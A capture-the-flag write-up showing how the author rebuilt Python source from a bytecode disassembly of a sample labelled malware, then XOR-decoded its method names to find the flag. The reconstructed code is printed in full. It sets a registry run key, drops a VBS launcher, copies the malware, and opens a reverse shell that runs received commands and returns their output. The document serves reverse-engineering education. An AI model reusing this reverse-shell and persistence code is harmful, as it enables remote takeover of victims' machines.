Rating: 5.0

Task

> This file was recovered from a malware infected machine, help us to uncover its secrets.
>
> Attachment: ekans.zip

Category: Practical

Unzipping the file we found a 400 lines long text file called `ekans.txt` ([download](https://gist.github.com/maurom/325e9ec3c26c17f78a47ab3c056d275c#file-ekans-txt)) that seems to be a sort of disassembly. By some key words on the file (`encode`, `b64decode`, `currentframe`, ...) we find that it is, in fact, a python bytecode disassembly such as the output of [dis - Disassembler for Python bytecode](https://docs.python.org/3/library/dis.html).

```
Disassembly of EdOxwEACgFH:
Disassembly of AC8AAxkqHjQGPxcvCzwdKGQ8:
27 0 LOAD_FAST 0 (self)
2 LOAD_ATTR 0 (__class__)
4 LOAD_ATTR 1 (__name__)
6 LOAD_METHOD 2 (encode)
8 CALL_METHOD 0
10 STORE_FAST 1 (mask)

28 12 LOAD_GLOBAL 3 (len)
14 LOAD_FAST 1 (mask)
16 CALL_FUNCTION 1
18 STORE_FAST 2 (lmask)

...
```

In essence, the CPython interpreter can be seen as a stack-based virtual machine, and thankfully the line format is detailed in [disco](https://docs.python.org/3/library/dis.html#dis.disco) and the opcodes in the [Python Bytecode Instructions](https://docs.python.org/3/library/dis.html#python-bytecode-instructions) documentation:

```
Source-Line-Number Bytecode-Address Opcode-Name Parameters Interpretation
```

So the first decoded block of that file tells us that on line `27` of the
(unknown yet) original source code:

1. There's a `EdOxwEACgFH` block (a class, maybe?), and inside it there's a `AC8AAxkqHjQGPxcvCzwdKGQ8` block (a method, probably), and inside it...
2. the first opcode, on offset `0`, [`LOAD_FAST`](https://docs.python.org/3/library/dis.html#opcode-LOAD_FAST)
pushes a reference to the local `self` variable onto the stack;
3. the next opcode, on offset `2`, [`LOAD_ATTR`](https://docs.python.org/3/library/dis.html#opcode-LOAD_ATTR)
replaces the top-of-stack value with the attribute `__class__` of the object
contained in the top-of-stack (`self`);
4. the next opcode does similarly, but now operating over `__class__`, so it
loads the attribute `__name__` on top of the stack;
5. the next opcode [`LOAD_METHOD`](https://docs.python.org/3/library/dis.html#opcode-LOAD_METHOD)
loads the method `encode` of the top-of-stack object;
6. the next one [`CALL_METHOD`](https://docs.python.org/3/library/dis.html#opcode-CALL_METHOD)
is, well, self-explanatory: call method `encode` with no arguments, removing
two of the top-of-stack objects and pushes the result on the stack;
7. finally [`STORE_FAST`](https://docs.python.org/3/library/dis.html#opcode-STORE_FAST)
stores the top-of-stack object into the variable `mask`.

That is:

```python
class EdOxwEACgFH:
def AC8AAxkqHjQGPxcvCzwdKGQ8(self):
mask = self.__class__.__name__.encode() # line 27
...
```

Line 28 on is left unconverted as an exercise to the reader.

We did a quick search for automatic (_magic!_) "re-assemblers" of this source format, but found none; so, rolling up my sleeves, I started parsing this bit by bit.

After converting every block of code, I had to add the required imports of modules `base64`, `inspect`, `os`, `socket` and `subprocess`; I skipped `winreg` because this is a linux machine and we don't allow such modules here, hehe. Also, there are some constants undefined, so I used `None` or `''` to define them.

Finally, as the order of the methods on the disassembly is messed up (due to compiler optimizations, I guess), I had to reorder the methods a little bit on my source code to match the line numbers on the disassembly to the ones on my source code.

This is what I got:

```python
#!/usr/bin/env python3

import base64
import inspect
import os
import socket
import subprocess
# from winreg import EnumValue, OpenKey, SetValueEx, HKEY_LOCAL_MACHINE, KEY_ALL_ACCESS, REG_SZ

KEY_NAME = ''
KEY_PATH = ''
REV_SHELL = ''
SHELL_PORT = ''
TRIGGER_PATH = ''
MALWARE_NAME = ''
MALWARE_PATH = ''

class EdOxwEACgFH:

def NRYgDBImHhwT(self, byt):
mask = self.__class__.__name__.encode()
lmask = len(mask)
return bytes(c ^ mask[i % lmask] for i, c in enumerate(byt))

def AC8AAxkqHjQGPxcvCzwdKGQ8(self):
mask = self.__class__.__name__.encode() # 27
lmask = len(mask)
self.NRYgDBImHhwT(base64.b64decode(inspect.currentframe().f_code.co_name))
key = OpenKey(HKEY_LOCAL_MACHINE, KEY_PATH)
keys = []
try:
i = 0
while True:
cur_key = EnumValue(key, i)
keys.append(cur_key[0])
i += 1
except:
pass
if KEY_NAME not in keys:
mlwr_key = OpenKey(HKEY_LOCAL_MACHINE, KEY_PATH, 0, KEY_ALL_ACCESS)
SetValueEx(mlwr_key, KEY_NAME, 0, REG_SZ, TRIGGER_PATH)
mlwr_key.Close()
return False
return True

def LQ0rHSgoIC8QJzog(self):
mask = self.__class__.__name__.encode()
lmask = len(mask)
self.NRYgDBImHhwT(base64.b64decode(inspect.currentframe().f_code.co_name))
if os.path.exists(MALWARE_PATH) and os.path.exists(TRIGGER_PATH):
return True
else:
payload = 'Set WshShell = WScript.CreateObject("WScript.Shell")\nWshShell.Run """{0}""", 0 , false'.format(MALWARE_PATH)
with open(TRIGGER_PATH, 'w') as f:
f.write(payload)
os.system('copy %s %s' % (MALWARE_NAME, MALWARE_PATH))
return False

def AwE5HQU2JDAPIyQp(self):
mask = self.__class__.__name__.encode() # 65
self.NRYgDBImHhwT(base64.b64decode(inspect.currentframe().f_code.co_name))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((REV_SHELL, SHELL_PORT))
flag = b'JgsiFRYrJWNHfGhl'
s.send('\n\\!/ anarc0der mlwr tutorial\n\n[*] If you need to finish, just type: quit\n[*] PRESS ENTER TO PROMPT\n\n')
while True:
data = s.recv(1024)
if 'quit' in data:
break
cmd = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
saida_cmd = cmd.stdout.read() + cmd.stderr.read()
s.send(saida_cmd)
s.send(self.NRYgDBImHhwT(base64.b64decode(flag)))
s.close()

def main():
my_returns = []
x = EdOxwEACgFH()
my_returns.append(x.AC8AAxkqHjQGPxcvCzwdKGQ8())
my_returns.append(x.LQ0rHSgoIC8QJzog())
if all(res is True for res in my_returns):
x.AwE5HQU2JDAPIyQp()
```

You can find a detailed explanation linking each block to each statement on [this github gist](https://gist.github.com/maurom/325e9ec3c26c17f78a47ab3c056d275c).

I saved the file as `/tmp/mw.py` (as some lines mention that path) and ran the disassembler:

```bash
$ cd /tmp
$ python3 > output.txt <<EOF
import dis
import mw
dis.dis(mw)
EOF

diff -wB output.txt ekans.txt # compare our disassembly with the original
```

The first time I tried, there were some differences because of the presence of `SETUP_LOOP` opcodes in the disassembly. Hmm...

Well, I was using Python 3.7, and it turns out that in Python 3.8 [they got rid of `SETUP_LOOP` and similar opcodes](https://docs.python.org/3/whatsnew/3.8.html#cpython-bytecode-changes). As the malware disassembly does not have any such opcodes, now we know that the person who compiled/disassembled the file was using that version or a newer one.

So now, armed with a dockerized python3.8...

```bash
$ cd /tmp
$ python3.8 > output.txt <<EOF
import dis
import mw
dis.dis(mw)
EOF

diff -wB output.txt ekans.txt # compare our disassembly with the original
```

```diff
314c315
< 28 LOAD_CONST 1 (<code object <genexpr> at 0x7fd96d5962f0, file "/tmp/mw.py", line 24>)
---
> 28 LOAD_CONST 1 ( at 0x7f0a5361b190, file "/tmp/mw.py", line 24>)
325c326
< Disassembly of at 0x7fd96d5962f0, file "/tmp/mw.py", line 24>:
---
> Disassembly of at 0x7f0a5361b190, file "/tmp/mw.py", line 24>:
370c373
< 40 LOAD_CONST 1 ( at 0x7fd96d3f89d0, file "/tmp/mw.py", line 86>)
---
> 40 LOAD_CONST 1 ( at 0x7f0a5361b660, file "/tmp/mw.py", line 86>)
386c389
< Disassembly of at 0x7fd96d3f89d0, file "/tmp/mw.py", line 86>:
---
> Disassembly of at 0x7f0a5361b660, file "/tmp/mw.py", line 86>:
```

Save for memory addresses, the disassembly of the hand-made source seems to be almost bit by bit identical to the original bytecode, se we're good to go. Read the [_Evolving Exact Decompilation_ paper](https://www.cs.unm.edu/~eschulte/data/bed.pdf) by Schulte et al if you, like me, are interest on byte-equivalent decompilation.

Well, by reading the source we can see that it is a part or a component of a windows malware, that sets some registry keys and on `AwE5HQU2JDAPIyQp()` it sets up a remote shell server.

On the same method there's an interesting `flag` variable `'JgsiFRYrJWNHfGhl'` that is "decoded" with the `NRYgDBImHhwT()` method and sent to a remote user every time after a command is received.

So checking out the `NRYgDBImHhwT()` method we find out that it basically does XOR of a byte sequence with the name of the current class `EdOxwEACgFH`.

Then the first step is to pass `flag` through `NRYgDBImHhwT()` to see what it comes out:

```bash
$ python3
> from base64 import b64decode
> from mw import EdOxwEACgFH
> EdOxwEACgFH().NRYgDBImHhwT(b64decode(b'JgsiFRYrJWNHfGhl'))
b'command : '
```

Oh, thats not the flag we were expecting. Damn!

However, every function name on this file seem fishy; lets use `NRYgDBImHhwT()` against every method on this file:

```
$ python3
> from base64 import b64decode
> from mw import EdOxwEACgFH
>
> obj = EdOxwEACgFH()
> for name in dir(EdOxwEACgFH):
> if not name.startswith('__'):
> print(name, obj.NRYgDBImHhwT(b64decode(name)))

AC8AAxkqHjQGPxcvCzwdKGQ8 b'EKO{no_way_jose_!}'
AwE5HQU2JDAPIyQp b'Feverseshell'
LQ0rHSgoIC8QJzog b'hide_malware'
NRYgDBImHhwT b'protec__t'
```

Well, there you have it, José.

Flag: `EKO{no_way_jose_!}`